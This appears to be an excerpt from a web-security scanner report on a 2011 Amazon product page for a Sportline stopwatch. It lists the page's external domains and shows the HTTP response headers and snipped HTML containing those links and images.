http://rd.a9.com/srv/redirect/?info=AFQsV8JOGjZvaNmGprhvTwuRlmx3Gf1bjLWVeshd411KDViyOO6PmwK8H8igP5BG4Xfay4qYtypgJ.yvwyHHUT6pmbZxP7BvYwyWUsnMOVzebdY6FTYWOWAzUjQFLmyHdhPk-tNE0iwDFnLiFrtoeOTEcEXViWYHrhJkP7cRqwha.N9NhPcOYNoWN.IBN4D5uPy8eQWJJCnc8byGMZCSkmtbxiZSUqgPfMIznEBSTWZXG-lTD4Pkph0MLOntkQHGQMyo3UhLtUv3ANYYPtTO-.0tKqX2M56YXU1BKqwKHFKDuneSvKdNtleagsIVUeioyVBiujbcm.ZIcfafZviPl7deZBBROE.zvsKY7k3IcJiQnRBbN1zCKBbGRu4jeSJz01KRH.ceT8rwwFsvaX17B.1Otkjkt-8AY-YxQdtaTAzw-WXzUqzh7Wyf2BDQGhFejiXxEia3cZ86-1H3TRFC0ec3oRb6YZoVnS9PsMziaD8KF3cTSxqYJIPtL9I8COX3qh5Kw48F-1tEsZP4A2QHl9QpACy3VtMOgn3Cj1MKVJdJJyhAR4JHEHq5GGtP0BxvVjrFUvDUH2CMGFSYQxqh.nwzYd-P1UgpeIkG4UWQkCwzqXzMUt1CyRNsDN-KTBnodYZXyY3RZmNIkRBGJ-JuTHxALlmditWF-XEYHtrs3k-agYA213pLsRSBHrpJdlyH-lo7ALz803X.IuAuibu5VJZhFScu458gu9PAGbKeW1OT3G.6-Df-suZa3LSIwed5dQ__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AHFzERbdz-1C0bsB66mosZJH0KIQZvkH7.Tv0ekUPlh7vGXrEohbOvHHhOGyvKt.Kvt4DwGCaR5GCwGHnu5RdWVgwOcgZHygd7I51QmqgjqJgQAPIVmlR6NcljKGlfxGtD1DfTmEzdXGJJ-t8-V77ArQ8YMJKK0O5MNJOnS7thKD2TTiVMAKYwLZz6cSUfE1h7tvFBJYNTLUpEMrlbcuIXNUqcz79.e8gGJckSH8ZQva3-.yWjUIHeDdWudFRdFSS0CVLCWybCOOmEJEbV1eLOJxBYil679U6eGhWsggyZnq8ahdSZOaPLAneadtPtQG1bpXTiDADhMjPHPUnIGR4rjDB7iwqWQ7YrypSCecy3vxS53N-37KdYu4NmrSjDwrcMaTrHMuyw1GQQZjmetPQqpqvk8HbKzD9qSzc2tJFM6Tmx.yVnbdYHU.Y8vlikyqFj2HmaYkdh9IQg43O4E-IcvdhGqlPb564Jy5CAHuR5VZNz2I8oRJyYZmt9V24JHPYfj7xb10r5jo.CowDS9fIjrMP-d.vTZyHPXAHk3zE5jC9-9qL8Cn2A0_&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:26 GMT
Server: Server
x-amz-id-1: 09N75F9VXRTTHCJ6W4N0
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: BhM/yiIeeNmHNPnM+XNOpz2cQi2I5DL2kxxjVh9EGVEK3Otk7l2KJ92BEBUF6OSA
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT
Content-Length: 378947

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_AA300_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL75_AA30_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/41dEc0Pyy-L._SL75_AA30_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
1G/ref=dp_image_z_0?ie=UTF8&n=3375251&s=sporting-goods" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_AA300_.jpg" id="prodImage" width="300" height="300" border="0" alt="Sportline Walking Advantage 228 Giant Stopwatch" onmouseover="" /></a>
...[SNIP]...
G/ref=dp_otherviews_z_0?ie=UTF8&s=sporting-goods&img=0" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL75_AA30_.jpg" width="30" height="30" border="0" /></a>
...[SNIP]...
G/ref=dp_otherviews_z_1?ie=UTF8&s=sporting-goods&img=1" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img src="http://ecx.images-amazon.com/images/I/41dEc0Pyy-L._SL75_AA30_.jpg" width="30" height="30" border="0" /></a>
...[SNIP]...
link_354823682_1?ie=UTF8&node=3375251&field-hidden-keywords=sg0111oihdef&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=hero-quick-promo&pf_rd_r=09N75F9VXRTTHCJ6W4N0&pf_rd_t=201&pf_rd_p=1287188182&pf_rd_i=B000EFAO1G">
<img src="http://g-ecx.images-amazon.com/images/G/01/img10/x-site/winter-post-holiday/75/save-50_75._SS75_V205558317_.gif" width="75" align="left" alt="Deep Discounts on Thousands of Products in Sports & Outdoors" height="75" border="0" />
</a>
...[SNIP]...
<div class="SponsoredLinkTitle">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ABej2w1aPwDZBEnjVVkoh0mPlMMBYHOZTFpf75GuVpeWdEXzB2oDKaiJkimNiMuG6M-J8H5ZMCgsqN7UL3KCKtP0cvkwXg.sRj2tPBi4exzMceg-.9m-e-scZdaorr0S5I.EuUzTdnpl5vrmP1cZEybD4F.zKV-q8V4BWajEf68aQyDtXzSNsSfKBLufSvawizCdcoPL9IchprMxZj.1VA7yx8l7Uzm5ikmSFDZ.YhYfDBxY0mWDLjFAk.FS3gU-CpvSqXmdNl3YXK0xzl12-5lj6vDlq92Gi39tGsoTU0cFiDjYDZZ703oifUOnNNDuaPsydk-1VqSZh5r4cP.6QwJS8pO5hRUEVG6ziXm.YcO0d4qqHOV2Ig26v6EALjzaNSLvFJazWEdN78eslW5REfjLW521tJF8hqhAhp6RPlT-LyfgQw9T0F-KKZtShTisyWpDcedIWnBSjll56xuAfXa-KxFKswPWoxjvt-FjevSlnN354zAU82Gi6K5u9I1tSw__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ABej2w1aPwDZBEnjVVkoh0mPlMMBYHOZTFpf75GuVpeWdEXzB2oDKaiJkimNiMuG6M-J8H5ZMCgsqN7UL3KCKtP0cvkwXg.sRj2tPBi4exzMceg-.9m-e-scZdaorr0S5I.EuUzTdnpl5vrmP1cZEybD4F.zKV-q8V4BWajEf68aQyDtXzSNsSfKBLufSvawizCdcoPL9IchprMxZj.1VA7yx8l7Uzm5ikmSFDZ.YhYfDBxY0mWDLjFAk.FS3gU-CpvSqXmdNl3YXK0xzl12-5lj6vDlq92Gi39tGsoTU0cFiDjYDZZ703oifUOnNNDuaPsydk-1VqSZh5r4cP.6QwJS8pO5hRUEVG6ziXm.YcO0d4qqHOV2Ig26v6EALjzaNSLvFJazWEdN78eslW5REfjLW521tJF8hqhAhp6RPlT-LyfgQw9T0F-KKZtShTisyWpDcedIWnBSjll56xuAfXa-KxFKswPWoxjvt-FjevSlnN354zAU82Gi6K5u9I1tSw__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescriptionDIV">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ABej2w1aPwDZBEnjVVkoh0mPlMMBYHOZTFpf75GuVpeWdEXzB2oDKaiJkimNiMuG6M-J8H5ZMCgsqN7UL3KCKtP0cvkwXg.sRj2tPBi4exzMceg-.9m-e-scZdaorr0S5I.EuUzTdnpl5vrmP1cZEybD4F.zKV-q8V4BWajEf68aQyDtXzSNsSfKBLufSvawizCdcoPL9IchprMxZj.1VA7yx8l7Uzm5ikmSFDZ.YhYfDBxY0mWDLjFAk.FS3gU-CpvSqXmdNl3YXK0xzl12-5lj6vDlq92Gi39tGsoTU0cFiDjYDZZ703oifUOnNNDuaPsydk-1VqSZh5r4cP.6QwJS8pO5hRUEVG6ziXm.YcO0d4qqHOV2Ig26v6EALjzaNSLvFJazWEdN78eslW5REfjLW521tJF8hqhAhp6RPlT-LyfgQw9T0F-KKZtShTisyWpDcedIWnBSjll56xuAfXa-KxFKswPWoxjvt-FjevSlnN354zAU82Gi6K5u9I1tSw__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">bodytronics.com</a>
...[SNIP]...
<div class="SponsoredLinkTitle">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFQsV8JOGjZvaNmGprhvTwuRlmx3Gf1bjLWVeshd411KDViyOO6PmwK8H8igP5BG4Xfay4qYtypgJ.yvwyHHUT6pmbZxP7BvYwyWUsnMOVzebdY6FTYWOWAzUjQFLmyHdhPk-tNE0iwDFnLiFrtoeOTEcEXViWYHrhJkP7cRqwha.N9NhPcOYNoWN.IBN4D5uPy8eQWJJCnc8byGMZCSkmtbxiZSUqgPfMIznEBSTWZXG-lTD4Pkph0MLOntkQHGQMyo3UhLtUv3ANYYPtTO-.0tKqX2M56YXU1BKqwKHFKDuneSvKdNtleagsIVUeioyVBiujbcm.ZIcfafZviPl7deZBBROE.zvsKY7k3IcJiQnRBbN1zCKBbGRu4jeSJz01KRH.ceT8rwwFsvaX17B.1Otkjkt-8AY-YxQdtaTAzw-WXzUqzh7Wyf2BDQGhFejiXxEia3cZ86-1H3TRFC0ec3oRb6YZoVnS9PsMziaD8KF3cTSxqYJIPtL9I8COX3qh5Kw48F-1tEsZP4A2QHl9QpACy3VtMOgn3Cj1MKVJdJJyhAR4JHEHq5GGtP0BxvVjrFUvDUH2CMGFSYQxqh.nwzYd-P1UgpeIkG4UWQkCwzqXzMUt1CyRNsDN-KTBnodYZXyY3RZmNIkRBGJ-JuTHxALlmditWF-XEYHtrs3k-agYA213pLsRSBHrpJdlyH-lo7ALz803X.IuAuibu5VJZhFScu458gu9PAGbKeW1OT3G.6-Df-suZa3LSIwed5dQ__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFQsV8JOGjZvaNmGprhvTwuRlmx3Gf1bjLWVeshd411KDViyOO6PmwK8H8igP5BG4Xfay4qYtypgJ.yvwyHHUT6pmbZxP7BvYwyWUsnMOVzebdY6FTYWOWAzUjQFLmyHdhPk-tNE0iwDFnLiFrtoeOTEcEXViWYHrhJkP7cRqwha.N9NhPcOYNoWN.IBN4D5uPy8eQWJJCnc8byGMZCSkmtbxiZSUqgPfMIznEBSTWZXG-lTD4Pkph0MLOntkQHGQMyo3UhLtUv3ANYYPtTO-.0tKqX2M56YXU1BKqwKHFKDuneSvKdNtleagsIVUeioyVBiujbcm.ZIcfafZviPl7deZBBROE.zvsKY7k3IcJiQnRBbN1zCKBbGRu4jeSJz01KRH.ceT8rwwFsvaX17B.1Otkjkt-8AY-YxQdtaTAzw-WXzUqzh7Wyf2BDQGhFejiXxEia3cZ86-1H3TRFC0ec3oRb6YZoVnS9PsMziaD8KF3cTSxqYJIPtL9I8COX3qh5Kw48F-1tEsZP4A2QHl9QpACy3VtMOgn3Cj1MKVJdJJyhAR4JHEHq5GGtP0BxvVjrFUvDUH2CMGFSYQxqh.nwzYd-P1UgpeIkG4UWQkCwzqXzMUt1CyRNsDN-KTBnodYZXyY3RZmNIkRBGJ-JuTHxALlmditWF-XEYHtrs3k-agYA213pLsRSBHrpJdlyH-lo7ALz803X.IuAuibu5VJZhFScu458gu9PAGbKeW1OT3G.6-Df-suZa3LSIwed5dQ__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescriptionDIV">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AFQsV8JOGjZvaNmGprhvTwuRlmx3Gf1bjLWVeshd411KDViyOO6PmwK8H8igP5BG4Xfay4qYtypgJ.yvwyHHUT6pmbZxP7BvYwyWUsnMOVzebdY6FTYWOWAzUjQFLmyHdhPk-tNE0iwDFnLiFrtoeOTEcEXViWYHrhJkP7cRqwha.N9NhPcOYNoWN.IBN4D5uPy8eQWJJCnc8byGMZCSkmtbxiZSUqgPfMIznEBSTWZXG-lTD4Pkph0MLOntkQHGQMyo3UhLtUv3ANYYPtTO-.0tKqX2M56YXU1BKqwKHFKDuneSvKdNtleagsIVUeioyVBiujbcm.ZIcfafZviPl7deZBBROE.zvsKY7k3IcJiQnRBbN1zCKBbGRu4jeSJz01KRH.ceT8rwwFsvaX17B.1Otkjkt-8AY-YxQdtaTAzw-WXzUqzh7Wyf2BDQGhFejiXxEia3cZ86-1H3TRFC0ec3oRb6YZoVnS9PsMziaD8KF3cTSxqYJIPtL9I8COX3qh5Kw48F-1tEsZP4A2QHl9QpACy3VtMOgn3Cj1MKVJdJJyhAR4JHEHq5GGtP0BxvVjrFUvDUH2CMGFSYQxqh.nwzYd-P1UgpeIkG4UWQkCwzqXzMUt1CyRNsDN-KTBnodYZXyY3RZmNIkRBGJ-JuTHxALlmditWF-XEYHtrs3k-agYA213pLsRSBHrpJdlyH-lo7ALz803X.IuAuibu5VJZhFScu458gu9PAGbKeW1OT3G.6-Df-suZa3LSIwed5dQ__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">grainger.com/Electrical-Timer</a>
...[SNIP]...
<div class="SponsoredLinkTitle">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHFzERbdz-1C0bsB66mosZJH0KIQZvkH7.Tv0ekUPlh7vGXrEohbOvHHhOGyvKt.Kvt4DwGCaR5GCwGHnu5RdWVgwOcgZHygd7I51QmqgjqJgQAPIVmlR6NcljKGlfxGtD1DfTmEzdXGJJ-t8-V77ArQ8YMJKK0O5MNJOnS7thKD2TTiVMAKYwLZz6cSUfE1h7tvFBJYNTLUpEMrlbcuIXNUqcz79.e8gGJckSH8ZQva3-.yWjUIHeDdWudFRdFSS0CVLCWybCOOmEJEbV1eLOJxBYil679U6eGhWsggyZnq8ahdSZOaPLAneadtPtQG1bpXTiDADhMjPHPUnIGR4rjDB7iwqWQ7YrypSCecy3vxS53N-37KdYu4NmrSjDwrcMaTrHMuyw1GQQZjmetPQqpqvk8HbKzD9qSzc2tJFM6Tmx.yVnbdYHU.Y8vlikyqFj2HmaYkdh9IQg43O4E-IcvdhGqlPb564Jy5CAHuR5VZNz2I8oRJyYZmt9V24JHPYfj7xb10r5jo.CowDS9fIjrMP-d.vTZyHPXAHk3zE5jC9-9qL8Cn2A0_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHFzERbdz-1C0bsB66mosZJH0KIQZvkH7.Tv0ekUPlh7vGXrEohbOvHHhOGyvKt.Kvt4DwGCaR5GCwGHnu5RdWVgwOcgZHygd7I51QmqgjqJgQAPIVmlR6NcljKGlfxGtD1DfTmEzdXGJJ-t8-V77ArQ8YMJKK0O5MNJOnS7thKD2TTiVMAKYwLZz6cSUfE1h7tvFBJYNTLUpEMrlbcuIXNUqcz79.e8gGJckSH8ZQva3-.yWjUIHeDdWudFRdFSS0CVLCWybCOOmEJEbV1eLOJxBYil679U6eGhWsggyZnq8ahdSZOaPLAneadtPtQG1bpXTiDADhMjPHPUnIGR4rjDB7iwqWQ7YrypSCecy3vxS53N-37KdYu4NmrSjDwrcMaTrHMuyw1GQQZjmetPQqpqvk8HbKzD9qSzc2tJFM6Tmx.yVnbdYHU.Y8vlikyqFj2HmaYkdh9IQg43O4E-IcvdhGqlPb564Jy5CAHuR5VZNz2I8oRJyYZmt9V24JHPYfj7xb10r5jo.CowDS9fIjrMP-d.vTZyHPXAHk3zE5jC9-9qL8Cn2A0_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescriptionDIV">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHFzERbdz-1C0bsB66mosZJH0KIQZvkH7.Tv0ekUPlh7vGXrEohbOvHHhOGyvKt.Kvt4DwGCaR5GCwGHnu5RdWVgwOcgZHygd7I51QmqgjqJgQAPIVmlR6NcljKGlfxGtD1DfTmEzdXGJJ-t8-V77ArQ8YMJKK0O5MNJOnS7thKD2TTiVMAKYwLZz6cSUfE1h7tvFBJYNTLUpEMrlbcuIXNUqcz79.e8gGJckSH8ZQva3-.yWjUIHeDdWudFRdFSS0CVLCWybCOOmEJEbV1eLOJxBYil679U6eGhWsggyZnq8ahdSZOaPLAneadtPtQG1bpXTiDADhMjPHPUnIGR4rjDB7iwqWQ7YrypSCecy3vxS53N-37KdYu4NmrSjDwrcMaTrHMuyw1GQQZjmetPQqpqvk8HbKzD9qSzc2tJFM6Tmx.yVnbdYHU.Y8vlikyqFj2HmaYkdh9IQg43O4E-IcvdhGqlPb564Jy5CAHuR5VZNz2I8oRJyYZmt9V24JHPYfj7xb10r5jo.CowDS9fIjrMP-d.vTZyHPXAHk3zE5jC9-9qL8Cn2A0_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">fastballfanatics.com/<b>
...[SNIP]...
<a href="http://www.amazon.com/Sportline-Walking-Advantage-Giant-Stopwatch/dp/B000EFAO1G/ref=pd_bxgy_sg_img_a"><img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_SS75_.jpg" width="75" alt="Sportline Walking Advantage 228 Giant Stopwatch" id="" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/ACCUSPLIT-Survivor-Stopwatch-Extra-Large-Display/dp/B0007ZGZUC/ref=pd_bxgy_sg_img_b"><img src="http://ecx.images-amazon.com/images/I/51SED5J6B4L._SL500_SS100_.jpg" width="75" alt="ACCUSPLIT Survivor Stopwatch with Clock and Extra-Large Display" id="" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51SED5J6B4L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51t69WdVNkL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CAA69047L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/518SMLBsPdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qLz9kHAnL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div id="mainItemImageContainer">
<img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_SY90_.jpg" width="71" alt="" style="padding-left:10px;padding-right:9px" id="mainItemImage" class="product-image" height="90" border="0" />
</div>
...[SNIP]...
<a href="http://www.amazon.com/Stott-Pilates-Secret-Weight-Loss/dp/B000EMRT2Q/ref=acc_glance_sg_ai_-2_t_1" title="Stott Pilates The Secret to Weight Loss Gift Pack">
<img src="http://ecx.images-amazon.com/images/I/519XS1AS1QL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Sportline-Walking-Advantage-Alpha-Stopwatch/dp/B000EG4614/ref=acc_glance_sg_ai_-2_t_2" title="Sportline Walking Advantage 410 Alpha Stopwatch">
<img src="http://ecx.images-amazon.com/images/I/31Y8BHTJ6FL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Sportline-Walking-Advantage-Count-Pedometer/dp/B000C3U9II/ref=acc_glance_sg_ai_-2_t_3" title="Sportline Walking Advantage 330 Step Count Pedometer">
<img src="http://ecx.images-amazon.com/images/I/41IOZx3OE0L._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41V%2BeXjhmOL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/419XADDZEQL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qahKV5tbL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41whOSISqRL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41BjBfz6r8L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CAA69047L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/183-0598759-1123006"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
